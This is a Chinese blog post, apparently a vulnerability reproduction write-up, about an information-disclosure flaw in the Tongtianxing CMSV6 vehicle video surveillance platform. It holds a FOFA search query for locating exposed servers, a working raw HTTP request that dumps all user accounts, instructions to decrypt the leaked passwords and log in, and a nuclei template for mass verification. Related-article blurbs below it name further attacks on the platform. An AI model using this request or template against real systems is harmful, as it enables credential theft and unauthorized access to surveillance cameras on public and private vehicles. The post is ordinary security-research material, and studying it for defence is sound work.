通天星CMSV6 车载视频监控平台 信息泄露漏

最新推荐文章于 2024-07-23 18:34:08 发布
最新推荐文章于 2024-07-23 18:34:08 发布
阅读量395 收藏 2
点赞数 8
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69775412/article/details/138131851
版权

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

漏洞描述

通天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞

fofa语句

body="/808gps/"

漏洞复现

打开页面

构造payload

POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Connection: close
Content-Length: 9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

json=null

将拿到的密码进行解密

使用账号密码进行登录

nuclei批量验证

id: TongTianXin-CMS-Information-disclosure

info:
  name: 通天星CMSV6 车载视频监控平台 信息泄露漏
  author: changge
  severity: high
  description: |
    通天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞。
  metadata:
    fofa-query: body="/808gps/"
  reference:
    - https://127.0.0.1
  tags: cms,tongtianxin,Information disclosure

http:
  - raw:
      - |
        POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
        Host: {{Hostname}}
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        json=null


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "admin"

github poc总汇地址:https://github.com/AYcg/poc

本文章首发于公众号【AY长歌】

阿一网络安全
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
天星CMSV6车载视频监控平台 getImage 任意文件读取洞复现
0xSec
02-26 1229
天星CMSV6车载视频监控平台StandardReportMediaAction_getImage.action接口处任意文件读取洞,未经身份认证的攻击者可以过此洞获取系统内部敏感文件信息,使系统处于极不安全状态。
天星CMSV6车载视频监控平台 downloadLogger.action 任意文件读取洞复现
0xSec
04-11 507
天星CMSV6车载视频监控平台downloadLogger.action接口处任意文件读取洞,未经身份认证的攻击者可以过此洞获取系统内部敏感文件信息,使系统处于极不安全状态。
天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE洞复现
0xSec
06-24 770
2024年5月,天星CMSV6发布新版本修复了一处SQL注入洞。洞是由于天星CMSV6车载定位监控平台未对用户的输入进行预编译,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入洞。该洞可过SQL注入实现文件写入进行远程代码执行,获取服务器权限。建议及时修复洞。
天星CMSV6 车载视频监控平台 信息泄露
qq_69775412的博客
03-15 660
天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露洞。
洞复现】天星CMSV6车载监控平台Login弱口令
晚风不及你
04-25 88
天星CMSV6车载视频监控平台存在弱口令洞,导致攻击者过此洞登录系统获取敏感信息
天星CMSV6车载视频监控平台disable接口处存在SQL注入洞 [附POC]
最新发布
薛定谔嘚喵博客
07-23 235
天星CMSV6车载视频监控平台disable存在SQL注入洞,攻击者可以过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
苹果CMSv10粉色大气视频站模板.zip
05-27
价值100元的商业苹果CMSv10粉色大气视频站模板,丰富自定义页面如全站单榜、周期更新、帮助页面,支持影视专题、影片评论、留言本、迅雷下载插件、用户中心。这套粉色大气视频站模板的效果基础上新增矢量图图标,更...
海洋cms(海洋视频内容管理系统) v6.63
10-10
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立
jfinal 信息咨询网 cms v4.7.1
10-09
jfinal cms是一个java开发的功能强大的信息咨询网站,采用了简洁强大的JFinal作为web框架,模板引擎用的是beetl,数据库用mysql,前端bootstrap框架。 支持oauth2认证、帐号注册、密码加密、评
海洋cms(海洋视频内容管理系统) v6.62
10-10
海洋CMS(海洋视频内容管理系统)V6.62是一款针对视频点播服务设计的专业内容管理系统。这款系统以其灵活性、便利性和人性化的操作界面为特点,旨在帮助用户在短时间内快速搭建起一个功能齐全的视频网站。在短短五...
海洋cms(海洋视频内容管理系统) v6.59
10-14
总体而言,海洋CMS V6.59是一个强大且易用的视频内容管理系统,适合那些希望快速构建视频平台但又缺乏技术背景的个人或团队。过深入理解和充分利用其各项功能,可以打造一个功能齐全、用户体验良好的视频分享网站...
cms用户注册及登录
03-09
这phpcms项目中的一个实例及用户注册和登录功能并有js的验证 但是 数据库没有导入。如需要 自己建一个库建对应的的表及其相应的字段。
CMSV6客户端使用指南中-中性文档
12-12
硕龙车载监控系统基础文档,提供基础操作以及各项模块指南。
洞复现】天星CMSV6车载监控平台Druid弱口令
晚风不及你
04-25 176
天星CMSV6车载视频监控平台存在Druid弱口令洞,导致攻击者过此洞登录系统获取敏感信息
洞复现】天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE
siu~
06-24 703
2024年5月,天星CMSV6发布新版本修复了一处SQL注入洞。洞是由于天星CMSV6车载定位监控平台未对用户的输入进行预编译,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入洞。该洞可过SQL注入实现文件写入进行远程代码执行,获取服务器权限。建议及时修复洞。
洞复现】天星CMSV6车载视频监控平台 StandardLoginAction_getAllUser 存在信息泄露
https://blog.echo234.cn/
03-28 469
天星CMSV6车载视频监控平台是东莞市天星软件科技有限公司研发的监控平台天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。天星CMSV6车载视频监控平台 StandardLoginAction_getAllUser存在信息泄露
洞复现】天星CMSV6车载视频监控平台 druid存在默认口令
https://blog.echo234.cn/
03-27 433
天星CMSV6车载视频监控平台是东莞市天星软件科技有限公司研发的监控平台天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。天星CMSV6车载视频监控平台 druid存在默认口令洞。
洞复现】天星CMSV6车载视频监控平台存在文件上传
https://blog.echo234.cn/
03-27 1493
天星CMSV6车载视频监控平台是东莞市天星软件科技有限公司研发的监控平台天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。天星CMSV6车载视频监控平台存在文件上传洞。
洞复现】天星CMSV6车载监控平台FTP匿名访问
晚风不及你
01-05 683
深圳市天星科技有限公司,是一家以从事计算机、信和其他电子设备制造业为主的企业。天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交上。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值